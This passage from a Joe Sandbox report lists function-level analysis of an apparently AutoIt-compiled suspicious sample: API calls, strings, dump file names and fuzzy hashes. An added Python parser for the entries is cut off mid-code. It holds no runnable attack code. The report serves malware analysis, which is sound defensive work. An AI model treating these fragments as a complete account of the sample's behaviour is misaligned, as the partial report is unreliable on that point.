                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      • Opcode ID: 311832f16626a365ac54cbc90ed62e7806bfe4ee6e9a87bd27d3e4dc58fdac29
                                                      • Instruction ID: 5f98cb3c05fdad439cba019af14a2fc76226e747445ef751f4484f6a868eb2da
                                                      • Opcode Fuzzy Hash: 311832f16626a365ac54cbc90ed62e7806bfe4ee6e9a87bd27d3e4dc58fdac29
                                                      • Instruction Fuzzy Hash: 4E313971810119AFCF01EFA1CD85EEEBFB9FF18310F10402AF815A6266DB315A56DBA0
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00AE6D86
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AE6DC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: 4290051d641ae896ac1c5cfdd34a285687812b22bd364ad6820c536475b3366a
                                                      • Instruction ID: 50efa0a345c3f92e8e44616e61603475c532ef0ed55491324b422c3107e9b4dd
                                                      • Opcode Fuzzy Hash: 4290051d641ae896ac1c5cfdd34a285687812b22bd364ad6820c536475b3366a
                                                      • Instruction Fuzzy Hash: 8931AF71210644AEDB10DF65CC80AFB77B9FF98760F548A19F8A587190DA31AC91CB60
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AC2E00
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AC2E3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 25f9ba39a2522ab3f63e0880ab938e9f37aa64aaa51aa30be13a1ec27fce9c4a
                                                      • Instruction ID: 5850d64d9b1127684206a09881178f0223c59f238708b05373bac73bcb67ad67
                                                      • Opcode Fuzzy Hash: 25f9ba39a2522ab3f63e0880ab938e9f37aa64aaa51aa30be13a1ec27fce9c4a
                                                      • Instruction Fuzzy Hash: B431D231A00309EBEB25DF58D985FEEBFF9EF05350F19406EE985A61A0EB709944CB50
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AE69D0
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AE69DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: 4b4af3a4e718126fbec5fdebc820d47f098fe42c899a78dff72c6687963b3e20
                                                      • Instruction ID: 21c5ad0fdbfd07e670daee97e9d2d58296459ee2936f0ca326d9ca3fa81dfe83
                                                      • Opcode Fuzzy Hash: 4b4af3a4e718126fbec5fdebc820d47f098fe42c899a78dff72c6687963b3e20
                                                      • Instruction Fuzzy Hash: 2211C4717002486FEF119F15CC80EFB3B6AEBA93E4F110524F9589B2A1D6719C5187A0
                                                      APIs
                                                        • Part of subcall function 00A61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A61D73
                                                        • Part of subcall function 00A61D35: GetStockObject.GDI32(00000011), ref: 00A61D87
                                                        • Part of subcall function 00A61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A61D91
                                                      • GetWindowRect.USER32(00000000,?), ref: 00AE6EE0
                                                      • GetSysColor.USER32(00000012), ref: 00AE6EFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: 8c87e95954b536ad31a824ded1d1d63ddb201d5e12c6362e8f6ddc1de7a68941
                                                      • Instruction ID: b1128141898d4c25935ed52d7ddf8ee0c9a0c6f63dc7557e91243b142dbd6e66
                                                      • Opcode Fuzzy Hash: 8c87e95954b536ad31a824ded1d1d63ddb201d5e12c6362e8f6ddc1de7a68941
                                                      • Instruction Fuzzy Hash: 9121567261024AAFDB04DFA8DD45AEA7BB8FB18354F004A28FD55D3251E634E8619B60
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00AE6C11
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00AE6C20
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 8b0fba6f05b76102a138d8d8829ae41f7a891624ea26334e245b3370f8ad3115
                                                      • Instruction ID: 21d30361f64211fa8e219af6b65bd491bacb81472e49bb69811ed96b0ab635cb
                                                      • Opcode Fuzzy Hash: 8b0fba6f05b76102a138d8d8829ae41f7a891624ea26334e245b3370f8ad3115
                                                      • Instruction Fuzzy Hash: F511BC71140288AFEB108F65DC85AEB3B69EB643B8F204B24F960D71E0C731DC919B60
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AC2F11
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AC2F30
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 111e818a6b027e5d4db762b110074aca01392678485b11a2178fef2cf590003b
                                                      • Instruction ID: e5abeecfb42ed625211e58b8fa35e20b63067062ef65fe009108d30fc22f545b
                                                      • Opcode Fuzzy Hash: 111e818a6b027e5d4db762b110074aca01392678485b11a2178fef2cf590003b
                                                      • Instruction Fuzzy Hash: DE11C432901218ABDB21DB58DC44FA977B9EB05310F1680BDE854B72A0DBB0ED15C7D1
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AD2520
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AD2549
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 36528b6889719dadd8351f41872f0f480a6a191a7170152b408e2967ee5c389f
                                                      • Instruction ID: 9a5c48be1606db6b55041998df84d097f6c1c8a4eed4b4c84e2136d2e6ff971f
                                                      • Opcode Fuzzy Hash: 36528b6889719dadd8351f41872f0f480a6a191a7170152b408e2967ee5c389f
                                                      • Instruction Fuzzy Hash: F311E0B4101225BEDB258F519C98FFBFFA8FB26351F10812BF90646240D2746981DBF0
                                                      APIs
                                                        • Part of subcall function 00AD830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00AD80C8,?,00000000,?,?), ref: 00AD8322
                                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AD80CB
                                                      • htons.WSOCK32(00000000,?,00000000), ref: 00AD8108
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 2496851823-2422070025
                                                      • Opcode ID: a914c8722674b82e9c4dcc1d0bbbb951e0e06ac1a2081baabbcb2b23167aeefa
                                                      • Instruction ID: 0936f87a77b525ebd01297dc8b8245d3d6805a49bd11e984bed62f16c3653a27
                                                      • Opcode Fuzzy Hash: a914c8722674b82e9c4dcc1d0bbbb951e0e06ac1a2081baabbcb2b23167aeefa
                                                      • Instruction Fuzzy Hash: B011C274500205ABCB20EFA4CC86FEDB374FF04360F10851BF9129B391DA31A8058751
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AB9355
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 92a50731544cd6816c79e61e1ccd444b358574c6c66523c7d0a6bbc5592ac255
                                                      • Instruction ID: a377ac0f3514367653a1e147e251a9fa1e2397a9f051ce66567db455b7c9cc60
                                                      • Opcode Fuzzy Hash: 92a50731544cd6816c79e61e1ccd444b358574c6c66523c7d0a6bbc5592ac255
                                                      • Instruction Fuzzy Hash: 57019E71A15224AB8B04EBA4CCA1CFE77BDBF16320B540659B9726B2D2DB3159088660
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AB924D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: a084d872d251877dc67b1163c687753de805ed74757549c311b338b4500d859d
                                                      • Instruction ID: c8a9f24816c28c2bc80f5c9adcc32b7f73f47e2399524ec4c8deb83d1790cad4
                                                      • Opcode Fuzzy Hash: a084d872d251877dc67b1163c687753de805ed74757549c311b338b4500d859d
                                                      • Instruction Fuzzy Hash: 47018F71E412087BDB08EBA0CAA6EFF77BD9F15340F140059BA12672D2EA116F1896B1
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AB92D0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 7f6d1a6ba18e4739493595bc1de54caf4f93bbb915b4593bb485b87de7bc2cdf
                                                      • Instruction ID: 58b1622d157ebd95a2a503df1ced21d1d967cc59864ed4c91ee3937127ed2de8
                                                      • Opcode Fuzzy Hash: 7f6d1a6ba18e4739493595bc1de54caf4f93bbb915b4593bb485b87de7bc2cdf
                                                      • Instruction Fuzzy Hash: 3701AD71E412087BCB04EBA0CA92EFF77BC9F25340F640125B912A32D3DA215F189272
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: 023997690cf60a0eea42e857b6203dd59f031f8eb58a71906fdff66052dfe57d
                                                      • Instruction ID: 84d6b1e49a99d1bbd3f60cb43865d7798e12ad567023ccef2b2f377ef26f1c79
                                                      • Opcode Fuzzy Hash: 023997690cf60a0eea42e857b6203dd59f031f8eb58a71906fdff66052dfe57d
                                                      • Instruction Fuzzy Hash: 67E02B32A002281AD720D7959C45FD7F7ECEB41721F00005AF910D3050E570AA4587D0
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AB81CA
                                                        • Part of subcall function 00A83598: _doexit.LIBCMT ref: 00A835A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Message_doexit
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 1993061046-4017498283
                                                      • Opcode ID: 51a3e5e1fba920bbdf9bf22e312a428f49cac8c261b85270582ed78ffe667052
                                                      • Instruction ID: d066b5e07c955fabb8c572d44d60a1c7950233c38e5401fd66514ac4a05f0556
                                                      • Opcode Fuzzy Hash: 51a3e5e1fba920bbdf9bf22e312a428f49cac8c261b85270582ed78ffe667052
                                                      • Instruction Fuzzy Hash: 69D0123228536836D21433E86D06BC6768C4B05F51F404425BB08555D389D556934399
                                                      APIs
                                                        • Part of subcall function 00A9B564: _memset.LIBCMT ref: 00A9B571
                                                        • Part of subcall function 00A80B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A9B540,?,?,?,00A6100A), ref: 00A80B89
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00A6100A), ref: 00A9B544
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A6100A), ref: 00A9B553
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A9B54E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 3158253471-631824599
                                                      • Opcode ID: 60d960318085e454798368787973f0cb26f5b5d348a79e470d9d051afb3b9c09
                                                      • Instruction ID: c00e46dbe2204bebca2db68ebf18893656dbb9fd86872dcdb35158baa67c61e1
                                                      • Opcode Fuzzy Hash: 60d960318085e454798368787973f0cb26f5b5d348a79e470d9d051afb3b9c09
                                                      • Instruction Fuzzy Hash: 34E06D70210351CFDB20DF68E6087427BE0AB04754F01896CE457C72A0DBB4D449CB61
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AE5BF5
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AE5C08
                                                        • Part of subcall function 00AC54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AC555E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 6a824620d6bdc3e4e93d14071484b3017ceb94315afc512923f5d1dcef28fc45
                                                      • Instruction ID: bdc0c0eabbadae08cab14ea603f5b1b5694ce730ab0d54ac17d3ae576188e3ef
                                                      • Opcode Fuzzy Hash: 6a824620d6bdc3e4e93d14071484b3017ceb94315afc512923f5d1dcef28fc45
                                                      • Instruction Fuzzy Hash: C6D0A931388340BBE728ABB0AC8BFD36A10EB40B00F000828B205AA0E0C8E46841C310
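The function entries above follow one fixed layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity, each with bullet items), which makes them easy to pivot on: the API String ID and the Instruction Fuzzy Hash are the fields an analyst would compare across reports of other samples. The parser below is an added example written for this page, not Joe Sandbox code; the field names it keys on are taken from the layout as it appears here and the sample input is two of this report's own entries (the IsDebuggerPresent entry and the Shell_TrayWnd entry), shortened. The trailing "Download File" link text that the report export leaves on the Associated lines is stripped during parsing.

```python
"""Parse Joe Sandbox per-function entries (added example, not Joe Sandbox code)."""
import re
from collections import defaultdict

# Sample input: two entries copied from this report, shortened (assumption:
# every entry uses exactly these five headings in this order).
SAMPLE_REPORT = """
APIs
  • Part of subcall function 00A9B564: _memset.LIBCMT ref: 00A9B571
  • Part of subcall function 00A80B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A9B540,?,?,?,00A6100A), ref: 00A80B89
• IsDebuggerPresent.KERNEL32(?,?,?,00A6100A), ref: 00A9B544
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A6100A), ref: 00A9B553
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A9B54E
Memory Dump Source
• Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
• Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Instruction Fuzzy Hash: 34E06D70210351CFDB20DF68E6087427BE0AB04754F01896CE457C72A0DBB4D449CB61
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AE5BF5
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AE5C08
  • Part of subcall function 00AC54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AC555E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
• Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Instruction Fuzzy Hash: C6D0A931388340BBE728ABB0AC8BFD36A10EB40B00F000828B205AA0E0C8E46841C310
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "[Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^(?:Part of subcall function ([0-9A-F]+): )?"
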